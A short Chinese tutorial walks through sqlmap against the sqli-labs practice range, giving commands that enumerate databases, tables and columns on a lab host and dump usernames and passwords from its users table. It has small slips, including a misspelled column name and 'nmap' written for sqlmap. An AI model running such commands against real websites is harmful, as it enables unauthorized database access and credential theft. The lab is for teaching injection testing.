SQLmap使用方法，sqli-labs靶场

前言

需要的环境：Kali Linux、sql-labs靶场

需要有 phpstudy 或者其他集成环境

简介

SQL-map是一个非常强大的注入的工具，自动化的SQL注入工具，其主要功能是扫描，发现并利用给定的URL进行SQL注入，支持mysql、sql-service 等

必备知识点：

--dbs	查看所有的数据库
-D	指定数据库
-T --tables	查看数据表
-C --dump	查看字段（用逗号隔开）

开始实验：

打开我们的sql靶场

 查看数据库

sqlmap -u 'http://10.23.1.172:88/Less-1/?id=1' --dbs

选择数据库

sqlmap -u 'http://10.23.1.172:88/Less-1/?id=1' -D security --tables

 选择数据表

 sqlmap -u "http://10.23.1.172:88/Less-1/?id=1" -D security -T users --columns

 查看数据字段

id password username 

sqlmap -u "http://10.23.1.172:88/Less-1/?id=1" -D security -T users -C id,password,uaername --dump

 看到里面的所有东西，完成实验

总结

简单使用nmap进行查询数据